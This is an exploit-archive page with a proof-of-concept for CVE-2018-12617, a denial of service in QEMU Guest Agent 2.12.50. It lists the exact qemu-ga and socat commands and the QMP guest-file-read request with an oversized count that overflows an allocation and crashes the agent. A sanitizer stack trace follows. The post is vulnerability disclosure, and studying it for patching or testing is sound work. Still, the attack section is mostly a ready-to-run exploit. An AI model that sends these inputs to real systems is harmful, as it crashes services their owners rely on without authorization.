what you don't know can hurt you

QEMU Guest Agent 2.12.50 Denial Of Service

QEMU Guest Agent 2.12.50 Denial Of Service
Posted Jun 22, 2018
Authored by Fakhri Zulkifli

QEMU Guest Agent version 2.12.50 suffers from a denial of service vulnerability.

tags | exploit, denial of service
advisories | CVE-2018-12617
MD5 | b12854edacb2fa3c3802ea55c15c6616

QEMU Guest Agent 2.12.50 Denial Of Service

Change Mirror Download
# Exploit Title: QEMU Guest Agent 2.12.50 - Denial of Service
# Date: 2018-06-07
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage: https://www.qemu.org/
# Software Link: https://www.qemu.org/download/
# Version: 2.12.50 and earlier
# Tested on: 2.12.50
# CVE : CVE-2018-12617

# QEMU Guest Agent 2.12.50 and earlier has an integer overflow causing a g_malloc0()
# call to trigger a segfault() call when trying to allocate a large memory chunk.
# The vulnerability can be exploited by sending a specific QMP command to
# the agent via the listening socket.

1st, execute the guest-agent using the following command:

$ qemu-ga -m unix-listen -p /tmp/qga.sock -t /tmp

2nd, on the other console, connect to the UNIX socket using socat:

$ socat unix-connect:/tmp/qga.sock -

3rd, enter the following QMP command:

{"execute":"guest-file-open", "arguments":{"path":"/tmp/poc","mode":"w+a}}
{"return": 1000}
{"execute":"guest-file-read", "arguments":{"handle":1000,"count":4294967295}}

The guest-file-read must be specified with the correct handle value (file descriptor). Different files will have different handle value.

#0 0x5598eed0a1af in calloc /home/user/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:107
#1 0x7f2ce5d7d770 in g_malloc0 (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4f770)
#2 0x5598eed84996 in qmp_marshal_guest_file_read /home/user/qemu/qga/qapi-generated/qga-qapi-commands.c:425:14
#3 0x5598eeda4fcf in do_qmp_dispatch /home/user/qemu/qapi/qmp-dispatch.c:119:5
#4 0x5598eeda4fcf in qmp_dispatch /home/user/qemu/qapi/qmp-dispatch.c:168
#5 0x5598eed59bff in process_command /home/user/qemu/qga/main.c:589:11
#6 0x5598eed59bff in process_event /home/user/qemu/qga/main.c:626
#7 0x5598eedb5f13 in json_message_process_token /home/user/qemu/qobject/json-streamer.c:105:5
#8 0x5598eee25d9b in json_lexer_feed_char /home/user/qemu/qobject/json-lexer.c:323:13
#9 0x5598eee25333 in json_lexer_feed /home/user/qemu/qobject/json-lexer.c:373:15
#10 0x5598eed5a95e in channel_event_cb /home/user/qemu/qga/main.c:659:9
#11 0x5598eed710c1 in ga_channel_client_event /home/user/qemu/qga/channel-posix.c:92:23
#12 0x7f2ce5d78049 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4a049)

# References:
# 1. https://lists.gnu.org/archive/html/qemu-devel/2018-06/msg03385.html


Login or Register to add favorites

File Archive:

October 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    16 Files
  • 2
    Oct 2nd
    1 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    24 Files
  • 5
    Oct 5th
    24 Files
  • 6
    Oct 6th
    11 Files
  • 7
    Oct 7th
    14 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    1 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    7 Files
  • 12
    Oct 12th
    15 Files
  • 13
    Oct 13th
    26 Files
  • 14
    Oct 14th
    10 Files
  • 15
    Oct 15th
    6 Files
  • 16
    Oct 16th
    2 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    14 Files
  • 19
    Oct 19th
    15 Files
  • 20
    Oct 20th
    20 Files
  • 21
    Oct 21st
    12 Files
  • 22
    Oct 22nd
    14 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close